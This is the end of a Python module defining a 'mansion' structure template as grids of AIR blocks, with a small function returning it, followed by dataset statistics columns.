            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
            [AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
        ]
    ]
}
def generate_mansions():
    """Return every mansion template this module provides.

    Currently there is a single fixed template, the module-level
    ``mansion`` dictionary; a fresh list is returned on each call.
    """
    templates = [mansion]
    return templates
| 65.584699
| 164
| 0.506249
| 1,735
| 12,002
| 3.488761
| 0.021326
| 1.158764
| 1.622171
| 2.026103
| 0.965967
| 0.965967
| 0.963985
| 0.954733
| 0.934908
| 0.895424
| 0
| 0.000119
| 0.2997
| 12,002
| 182
| 165
| 65.945055
| 0.720048
| 0
| 0
| 0.784091
| 0
| 0
| 0.047409
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005682
| false
| 0
| 0.005682
| 0.005682
| 0.017045
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.